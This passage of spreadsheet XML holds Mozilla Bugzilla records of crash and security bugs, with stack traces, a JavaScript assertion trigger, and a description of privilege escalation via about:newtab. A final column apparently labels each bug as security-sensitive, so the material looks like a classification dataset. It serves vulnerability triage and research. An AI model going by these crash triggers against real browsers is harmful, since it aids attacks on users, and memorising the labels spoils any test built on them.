    #6 0x7f0b92623eba in AppendUTF8toUTF16(nsACString_internal const&amp;, nsAString_internal&amp;, mozilla::fallible_t const&amp;) xpcom/string/src/nsReadableUtils.cpp:195
    #7 0x7f0b92623027 in AppendUTF8toUTF16(nsACString_internal const&amp;, nsAString_internal&amp;) xpcom/string/src/nsReadableUtils.cpp:184
    #8 0x7f0b92a0b895 in NS_ConvertUTF8toUTF16 objdir-ff-asan64dbg/netwerk/dns/../../dist/include/nsString.h:169
    #9 0x7f0b92a0b895 in nsIDNService::UTF8toACE(nsACString_internal const&amp;, nsACString_internal&amp;, bool, bool) netwerk/dns/nsIDNService.cpp:170
    #10 0x7f0b92a0790b in nsDNSService::AsyncResolve(nsACString_internal const&amp;, unsigned int, nsIDNSListener*, nsIEventTarget*, nsICancelable**) netwerk/dns/nsDNSService2.cpp:685
    #11 0x7f0b928ff113 in nsDNSPrefetch::Prefetch(unsigned short) netwerk/base/src/nsDNSPrefetch.cpp:61
    #12 0x7f0b92caaf25 in mozilla::net::nsHttpChannel::BeginConnect() netwerk/protocol/http/nsHttpChannel.cpp:4600
    #13 0x7f0b92cabef1 in mozilla::net::nsHttpChannel::OnProxyAvailable(nsICancelable*, nsIURI*, nsIProxyInfo*, tag_nsresult) netwerk/protocol/http/nsHttpChannel.cpp:4710
    #14 0x7f0b929930ae in nsAsyncResolveRequest::DoCallback() netwerk/base/src/nsProtocolProxyService.cpp:247
    #15 0x7f0b929522b8 in nsRefPtr&lt;nsAsyncResolveRequest&gt;::operator-&gt;() const netwerk/base/src/nsProtocolProxyService.cpp:139
    #16 0x7f0b929522b8 in nsProtocolProxyService::AsyncResolveInternal(nsIURI*, unsigned int, nsIProtocolProxyCallback*, nsICancelable**, bool) netwerk/base/src/nsProtocolProxyService.cpp:1143
    #17 0x7f0b92c9c276 in mozilla::net::nsHttpChannel::ResolveProxy() netwerk/protocol/http/nsHttpChannel.cpp:1826
    #18 0x7f0b92ca9feb in mozilla::net::nsHttpChannel::AsyncOpen(nsIStreamListener*, nsISupports*) netwerk/protocol/http/nsHttpChannel.cpp:4500
    #19 0x7f0b982054a0 in nsHTTPDownloadEvent::Run() security/manager/ssl/src/nsNSSCallbacks.cpp:157
This issue is similar to bug 1015973 but has a different cause according to comment 4 in that bug. It also reproduces with the patch from that bug.
Marked s-s until investigated and confirmed to be harmless.</t>
        </is>
      </c>
      <c r="X3826" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3827">
      <c r="A3827" t="n">
        <v>612749</v>
      </c>
      <c r="B3827" t="inlineStr">
        <is>
          <t>2010-11-16 16:27:36 -0800</t>
        </is>
      </c>
      <c r="C3827" t="inlineStr">
        <is>
          <t>Logout page</t>
        </is>
      </c>
      <c r="D3827" t="inlineStr">
        <is>
          <t>2010-12-08 16:57:40 -0800</t>
        </is>
      </c>
      <c r="E3827" t="n">
        <v>1</v>
      </c>
      <c r="F3827" t="n">
        <v>1</v>
      </c>
      <c r="G3827" t="n">
        <v>5</v>
      </c>
      <c r="H3827" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3827" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3827" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K3827" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3827" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3827" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3827" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3827" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3827" t="inlineStr"/>
      <c r="Q3827" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3827" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3827" t="inlineStr">
        <is>
          <t>2.4</t>
        </is>
      </c>
      <c r="T3827" t="n">
        <v>1</v>
      </c>
      <c r="U3827" t="n">
        <v>0</v>
      </c>
      <c r="V3827" t="n">
        <v>4</v>
      </c>
      <c r="W3827" t="inlineStr">
        <is>
          <t>Destroy the session, yadda yadda yadda.</t>
        </is>
      </c>
      <c r="X3827" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3828">
      <c r="A3828" t="n">
        <v>685321</v>
      </c>
      <c r="B3828" t="inlineStr">
        <is>
          <t>2011-09-07 14:54:11 -0700</t>
        </is>
      </c>
      <c r="C3828" t="inlineStr">
        <is>
          <t>Assertion failure: [infer failure] Missing type pushed 0: int, at jsinfer.cpp:341 with destructuring assignment</t>
        </is>
      </c>
      <c r="D3828" t="inlineStr">
        <is>
          <t>2012-02-23 17:31:16 -0800</t>
        </is>
      </c>
      <c r="E3828" t="n">
        <v>1</v>
      </c>
      <c r="F3828" t="n">
        <v>1</v>
      </c>
      <c r="G3828" t="n">
        <v>3</v>
      </c>
      <c r="H3828" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3828" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3828" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3828" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3828" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3828" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3828" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3828" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3828" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q3828" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3828" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3828" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T3828" t="n">
        <v>1</v>
      </c>
      <c r="U3828" t="n">
        <v>0</v>
      </c>
      <c r="V3828" t="n">
        <v>44</v>
      </c>
      <c r="W3828" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision b7d269a291b6 (options -m -n -a):
function f() {
    function g() {
        for (var i = 0; i &lt; 3; i++)
        x = i;
    };
    var [x] = 0;
    g();
    assertEq(x, 2);
}
f();</t>
        </is>
      </c>
      <c r="X3828" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3829">
      <c r="A3829" t="n">
        <v>769108</v>
      </c>
      <c r="B3829" t="inlineStr">
        <is>
          <t>2012-06-27 17:12:32 -0700</t>
        </is>
      </c>
      <c r="C3829" t="inlineStr">
        <is>
          <t>Chrome-privileged about:newtab remains in the history chain</t>
        </is>
      </c>
      <c r="D3829" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:55 -0700</t>
        </is>
      </c>
      <c r="E3829" t="n">
        <v>1</v>
      </c>
      <c r="F3829" t="n">
        <v>1</v>
      </c>
      <c r="G3829" t="n">
        <v>3</v>
      </c>
      <c r="H3829" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3829" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3829" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3829" t="inlineStr">
        <is>
          <t>13 Branch</t>
        </is>
      </c>
      <c r="L3829" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3829" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3829" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3829" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3829" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3829" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3829" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3829" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T3829" t="n">
        <v>1</v>
      </c>
      <c r="U3829" t="n">
        <v>0</v>
      </c>
      <c r="V3829" t="n">
        <v>12</v>
      </c>
      <c r="W3829" t="inlineStr">
        <is>
          <t>When user opens a page from a new tab, by either typing in the URL bar or selecting one of the pinned/bookmarked sites, then any page subsequently loaded in this tab can spawn a new window and navigate itself back to about:newtab. This is inherently unsafe, because about:newtab is chrome-privileged, and content can use the obtained reference for privilege escalation attacks.</t>
        </is>
      </c>
      <c r="X3829" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3830">
      <c r="A3830" t="n">
        <v>437039</v>
      </c>
      <c r="B3830" t="inlineStr">
        <is>
          <t>2008-06-03 04:12:58 -0700</t>
        </is>
      </c>
      <c r="C3830" t="inlineStr">
        <is>
          <t>"cp: cannot stat `optional/*': No such file or directory" in l10n and update verify logs</t>
        </is>
      </c>
      <c r="D3830" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3830" t="n">
        <v>1</v>
      </c>
      <c r="F3830" t="n">
        <v>1</v>
      </c>
      <c r="G3830" t="n">
        <v>5</v>
      </c>
      <c r="H3830" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3830" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3830" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3830" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3830" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3830" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3830" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3830" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3830" t="inlineStr"/>
      <c r="Q3830" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3830" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3830" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3830" t="n">
        <v>1</v>
      </c>
      <c r="U3830" t="n">
        <v>0</v>
      </c>
      <c r="V3830" t="n">
        <v>4</v>
      </c>
      <c r="W3830" t="inlineStr">
        <is>
          <t>This is an issue with Firefox 3 installers on win32, where because optional/ is no longer present. It used to contain Talkback and the DOM Inspector as options in a Custom install. The error itself is harmless but pollutes the logs a bit.</t>
        </is>
      </c>
      <c r="X3830" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3831">
      <c r="A3831" t="n">
        <v>287436</v>
      </c>
      <c r="B3831" t="inlineStr">
        <is>
          <t>2005-03-23 13:54:06 -0800</t>
        </is>
      </c>
      <c r="C3831" t="inlineStr">
        <is>
          <t>After having logged in, links to change the report type contain username and password</t>
        </is>
      </c>
      <c r="D3831" t="inlineStr">
        <is>
          <t>2005-05-11 22:24:51 -0700</t>
        </is>
      </c>
      <c r="E3831" t="n">
        <v>1</v>
      </c>
      <c r="F3831" t="n">
        <v>1</v>
      </c>
      <c r="G3831" t="n">
        <v>4</v>
      </c>
      <c r="H3831" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3831" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3831" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K3831" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L3831" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3831" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3831" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3831" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3831" t="inlineStr"/>
      <c r="Q3831" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3831" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3831" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3831" t="n">
        <v>1</v>
      </c>
      <c r="U3831" t="n">
        <v>0</v>
      </c>
      <c r="V3831" t="n">
        <v>10</v>
      </c>
      <c r="W3831" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; pl-PL; rv:1.7.5) Gecko/20041108 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; pl-PL; rv:1.7.5) Gecko/20041108 Firefox/1.0
This bug occurred on my bugzilla installation, using Firefox which needs to
re-log in to almost every time I go to different page, but you can also use the
following repro steps.
Reproducible: Always
Steps to Reproduce:
1. go to https://bugzilla.mozilla.org/query.cgi?format=report-table and choose
some fields to gather data for report
2. if you are logged in, log out (e.g. on another tab)
3. click 'Generate Report'
4. login as requested
5. choose link for different report type (like 'Bar', 'Line', or 'CSV')
Actual Results:  
Username and password is visible in links.
Expected Results:  
Don't show username and password.</t>
        </is>
      </c>
      <c r="X3831" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3832">
      <c r="A3832" t="n">
        <v>1381242</v>
      </c>
      <c r="B3832" t="inlineStr">
        <is>
          <t>2017-07-15 07:22:15 -0700</t>
        </is>
      </c>
      <c r="C3832" t="inlineStr">
        <is>
          <t>Remove pre_compile workaround for buildpack cache ordering issue</t>
        </is>
      </c>
      <c r="D3832" t="inlineStr">
        <is>
          <t>2017-07-17 01:43:38 -0700</t>
        </is>
      </c>
      <c r="E3832" t="n">
        <v>1</v>
      </c>
      <c r="F3832" t="n">
        <v>1</v>
      </c>
      <c r="G3832" t="n">
        <v>7</v>
      </c>
      <c r="H3832" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3832" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3832" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K3832" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3832" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3832" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3832" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3832" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3832" t="inlineStr"/>
      <c r="Q3832" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3832" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3832" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3832" t="n">
        <v>1</v>
      </c>
      <c r="U3832" t="n">
        <v>0</v>
      </c>
      <c r="V3832" t="n">
        <v>3</v>
      </c>
      <c r="W3832" t="inlineStr">
        <is>
          <t>A workaround was added to `bin/pre_compile` to handle the Python buildpack not restoring the cache in time for when the pre_compile script is run.
That's now been fixed upstream:
https://github.com/heroku/heroku-buildpack-python/pull/321
...so the workaround must, since the it breaks when the bug is fixed. The only reason this hasn't affected us sooner, is that the library is cached from one build to the next - though we can't rely on that.</t>
        </is>
      </c>
      <c r="X3832" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3833">
      <c r="A3833" t="n">
        <v>564113</v>
      </c>
      <c r="B3833" t="inlineStr">
        <is>
          <t>2010-05-05 23:00:33 -0700</t>
        </is>
      </c>
      <c r="C3833" t="inlineStr">
        <is>
          <t>Webtrends: Deploy webtrends tracking code in two separate script tags</t>
        </is>
      </c>
      <c r="D3833" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E3833" t="n">
        <v>1</v>
      </c>
      <c r="F3833" t="n">
        <v>1</v>
      </c>
      <c r="G3833" t="n">
        <v>5</v>
      </c>
      <c r="H3833" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3833" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J3833" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3833" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3833" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3833" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3833" t="inlineStr"/>
      <c r="Q3833" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3833" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3833" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3833" t="n">
        <v>1</v>
      </c>
      <c r="U3833" t="n">
        <v>0</v>
      </c>
      <c r="V3833" t="n">
        <v>3</v>
      </c>
      <c r="W3833" t="inlineStr">
        <is>
          <t>Webtrends writes:
"The inline HTML (attached) was modified and the dcsGetID / dcsCollect functions have been included within the same &lt;SCRIPT&gt; block.  This breaks our [code].  Please review the recommended inline HTML deployment and update this."
Apparently, this is not a joke.</t>
        </is>
      </c>
      <c r="X3833" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3834">
      <c r="A3834" t="n">
        <v>11484</v>
      </c>
      <c r="B3834" t="inlineStr">
        <is>
          <t>1999-08-09 14:43:19 -0700</t>
        </is>
      </c>
      <c r="C3834" t="inlineStr">
        <is>
          <t>apprunner crashes when trying to load any xul file</t>
        </is>
      </c>
      <c r="D3834" t="inlineStr">
        <is>
          <t>2017-02-03 12:19:00 -0800</t>
        </is>
      </c>
      <c r="E3834" t="n">
        <v>1</v>
      </c>
      <c r="F3834" t="n">
        <v>1</v>
      </c>
      <c r="G3834" t="n">
        <v>3</v>
      </c>
      <c r="H3834" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3834" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3834" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3834" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3834" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3834" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N3834" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3834" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3834" t="inlineStr">
        <is>
          <t>all done</t>
        </is>
      </c>
      <c r="Q3834" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3834" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3834" t="inlineStr">
        <is>
          <t>M9</t>
        </is>
      </c>
      <c r="T3834" t="n">
        <v>1</v>
      </c>
      <c r="U3834" t="n">
        <v>0</v>
      </c>
      <c r="V3834" t="n">
        <v>7</v>
      </c>
      <c r="W3834" t="inlineStr">
        <is>
          <t>apprunner when started with apprunner resource:/&lt;xul file path and name&gt;
brings up a blank window (about: blank), instead of the xul file.
Then, if you try putting the location of the xul file in the location
bar, it crashes. Marking the bug as a blocker, as it does not allow
us to test any xul files.
Here is the stack trace:
NTDLL! 77f76148()
nsDebug::Assertion(const char * 0x01496c08, const char * 0x01496b24, const char
* 0x01496af4, int 74) line 176 + 13 bytes
mork_assertion_signal(const char * 0x01496c08) line 74 + 31 bytes
morkEnv::NewError(const char * 0x01496c70) line 362 + 19 bytes
morkEnv::NilPointerError() line 403
morkStore::StageYarnAsBookAtom(morkEnv * 0x00adc3f0, const mdbYarn * 0x0012ed60,
morkAtomSpace * 0x00adc150) line 422
morkStore::YarnToAtom(morkEnv * 0x00adc3f0, const mdbYarn * 0x0012ed60) line 710
+ 20 bytes
morkRow::AddColumn(morkEnv * 0x00adc3f0, unsigned long 133, const mdbYarn *
0x0012ed60, morkStore * 0x00d59898) line 808 + 16 bytes
orkinRow::AddColumn(nsIMdbEnv * 0x00ae8668, unsigned long 133, const mdbYarn *
0x0012ed60) line 461
nsGlobalHistory::SetPageTitle(nsGlobalHistory * const 0x00ae3fc0, const char *
0x09b0e580, const unsigned short * 0x00000000) line 761 + 49 bytes
XPTC_InvokeByIndex(nsISupports * 0x00ae3fc0, unsigned int 4, unsigned int 2,
nsXPTCVariant * 0x0012eeac) line 135
nsXPCWrappedNativeClass::CallWrappedMethod(JSContext * 0x09b969a0,
nsXPCWrappedNative * 0x0a320900, const XPCNativeMemberDescriptor * 0x0a320988,
nsXPCWrappedNativeClass::CallMode CALL_METHOD, unsigned int 2, long *
0x00d91d34, long * 0x0012f0b4) line 511 + 44 bytes
WrappedNative_CallMethod(JSContext * 0x09b969a0, JSObject * 0x00dd0088, unsigned
int 2, long * 0x00d91d34, long * 0x0012f0b4) line 130
js_Invoke(JSContext * 0x09b969a0, unsigned int 2, unsigned int 0) line 654 + 26
bytes
js_Interpret(JSContext * 0x09b969a0, long * 0x0012f8e0) line 2228 + 15 bytes
js_Invoke(JSContext * 0x09b969a0, unsigned int 1, unsigned int 2) line 670 + 13
bytes
js_InternalCall(JSContext * 0x09b969a0, JSObject * 0x00d52068, long 14082528,
unsigned int 1, long * 0x0012f9bc, long * 0x0012f9c4) line 747 + 15 bytes
JS_CallFunction(JSContext * 0x09b969a0, JSObject * 0x00d52068, JSFunction *
0x09b96630, unsigned int 1, long * 0x0012f9bc, long * 0x0012f9c4) line 2611 + 32
bytes
nsJSDOMEventListener::HandleEvent(nsIDOMEvent * 0x0a357e30) line 79 + 37 bytes
nsEventListenerManager::HandleEvent(nsIPresContext &amp; {...}, nsEvent *
0x0012fcd8, nsIDOMEvent * * 0x0012fbd4, unsigned int 4, nsEventStatus &amp;
nsEventStatus_eIgnore) line 971 + 21 bytes
GlobalWindowImpl::HandleDOMEvent(GlobalWindowImpl * const 0x09b96b64,
nsIPresContext &amp; {...}, nsEvent * 0x0012fcd8, nsIDOMEvent * * 0x0012fbd4,
unsigned int 4, nsEventStatus &amp; nsEventStatus_eIgnore) line 2807
XULDocumentImpl::HandleDOMEvent(XULDocumentImpl * const 0x09b916d0,
nsIPresContext &amp; {...}, nsEvent * 0x0012fcd8, nsIDOMEvent * * 0x0012fbd4,
unsigned int 4, nsEventStatus &amp; nsEventStatus_eIgnore) line 2340
GlobalWindowImpl::HandleDOMEvent(GlobalWindowImpl * const 0x0a0ab844,
nsIPresContext &amp; {...}, nsEvent * 0x0012fcd8, nsIDOMEvent * * 0x0012fbd4,
unsigned int 4, nsEventStatus &amp; nsEventStatus_eIgnore) line 2801
XULDocumentImpl::HandleDOMEvent(XULDocumentImpl * const 0x0a0bf1e0,
nsIPresContext &amp; {...}, nsEvent * 0x0012fcd8, nsIDOMEvent * * 0x0012fbd4,
unsigned int 4, nsEventStatus &amp; nsEventStatus_eIgnore) line 2340
GlobalWindowImpl::HandleDOMEvent(GlobalWindowImpl * const 0x0a180a84,
nsIPresContext &amp; {...}, nsEvent * 0x0012fcd8, nsIDOMEvent * * 0x0012fbd4,
unsigned int 1, nsEventStatus &amp; nsEventStatus_eIgnore) line 2801
nsWebShell::OnEndDocumentLoad(nsWebShell * const 0x0a17c5e4, nsIDocumentLoader *
0x0a17b160, nsIChannel * 0x09b0ef80, unsigned int 0, nsIDocumentLoaderObserver *
0x0a17c5e4) line 3286 + 34 bytes
nsDocLoaderImpl::FireOnEndDocumentLoad(nsIDocumentLoader * 0x0a17b160, unsigned
int 0) line 1124
nsDocLoaderImpl::OnStopRequest(nsDocLoaderImpl * const 0x0a17b164, nsIChannel *
0x0a357840, nsISupports * 0x00000000, unsigned int 0, const unsigned short *
0x00000000) line 1031
nsOnStopRequestEvent::HandleEvent(nsOnStopRequestEvent * const 0x0a357dd0) line
274
nsStreamListenerEvent::HandlePLEvent(PLEvent * 0x0a357dd4) line 149 + 12 bytes
PL_HandleEvent(PLEvent * 0x0a357dd4) line 509 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x00b1ee00) line 470 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x00dd030c, unsigned int 49394, unsigned int 0,
long 11660800) line 932 + 9 bytes
USER32! 77e713ed()
00b1ee00()</t>
        </is>
      </c>
      <c r="X3834" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3835">
      <c r="A3835" t="n">
        <v>442227</v>
      </c>
      <c r="B3835" t="inlineStr">
        <is>
          <t>2008-06-27 04:48:25 -0700</t>
        </is>
      </c>
      <c r="C3835" t="inlineStr">
        <is>
          <t>Crash [@ nsFrameManager::GetPrimaryFrameFor] with mathml, DOMAttrModified doing stuff</t>
        </is>
      </c>
      <c r="D3835" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E3835" t="n">
        <v>1</v>
      </c>
      <c r="F3835" t="n">
        <v>1</v>
      </c>
      <c r="G3835" t="n">
        <v>3</v>
      </c>
      <c r="H3835" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3835" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3835" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3835" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3835" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3835" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3835" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3835" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3835" t="inlineStr">
        <is>
          <t>[sg:dos] null deref</t>
        </is>
      </c>
      <c r="Q3835" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3835" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3835" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3835" t="n">
        <v>1</v>
      </c>
      <c r="U3835" t="n">
        <v>0</v>
      </c>
      <c r="V3835" t="n">
        <v>22</v>
      </c>
      <c r="W3835" t="inlineStr">
        <is>
          <t>Created attachment 327093
testcase
See testcase, which crashes current trunk build after 200ms.
It also crashes Firefox 3.
This regressed between 2008-01-29 and 2008-01-30:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2008-01-29+04&amp;maxdate=2008-01-30+09&amp;cvsroot=%2Fcvsroot
I think a regression from bug 391002, somehow.
Stack trace from debug build:
&gt;	gklayout.dll!nsFrameManager::GetPrimaryFrameFor(nsIContent * aContent=0x066d6cf0, int aIndexHint=2)  Line 377 + 0xb bytes	C++
 	gklayout.dll!nsCSSFrameConstructor::ContentRemoved(nsIContent * aContainer=0x012eb140, nsIContent * aChild=0x066d6cf0, int aIndexInContainer=2, int * aDidReconstruct=0x0012e74c)  Line 9485 + 0x1d bytes	C++
 	gklayout.dll!PresShell::ContentRemoved(nsIDocument * aDocument=0x050578e8, nsIContent * aContainer=0x012eb140, nsIContent * aChild=0x066d6cf0, int aIndexInContainer=2)  Line 4766	C++
 	gklayout.dll!nsNodeUtils::ContentRemoved(nsINode * aContainer=0x012eb140, nsIContent * aChild=0x066d6cf0, int aIndexInContainer=2)  Line 167 + 0xe6 bytes	C++
 	gklayout.dll!nsGenericElement::doRemoveChildAt(unsigned int aIndex=2, int aNotify=1, nsIContent * aKid=0x066d6cf0, nsIContent * aParent=0x012eb140, nsIDocument * aDocument=0x050578e8, nsAttrAndChildArray &amp; aChildArray={...})  Line 2846 + 0x11 bytes	C++
 	gklayout.dll!nsGenericElement::RemoveChildAt(unsigned int aIndex=2, int aNotify=1)  Line 2776 + 0x2a bytes	C++
 	gklayout.dll!nsXULElement::RemoveChildAt(unsigned int aIndex=2, int aNotify=1)  Line 1029 + 0x13 bytes	C++
 	gklayout.dll!nsGenericElement::doRemoveChild(nsIDOMNode * aOldChild=0x066d6d0c, nsIContent * aParent=0x012eb140, nsIDocument * aDocument=0x050578e8, nsIDOMNode * * aReturn=0x0012eb28)  Line 3438 + 0x13 bytes	C++
 	gklayout.dll!nsGenericElement::RemoveChild(nsIDOMNode * aOldChild=0x066d6d0c, nsIDOMNode * * aReturn=0x0012eb28)  Line 3004 + 0x1a bytes	C++
 	gklayout.dll!nsXULElement::RemoveChild(nsIDOMNode * oldChild=0x066d6d0c, nsIDOMNode * * _retval=0x0012eb28)  Line 614 + 0x14 bytes	C++
 	xpcom_core.dll!NS_InvokeByIndex_P(nsISupports * that=0x00000011, unsigned int methodIndex=2, unsigned int paramCount=1239832, nsXPTCVariant * params=0x00000000)  Line 102	C++
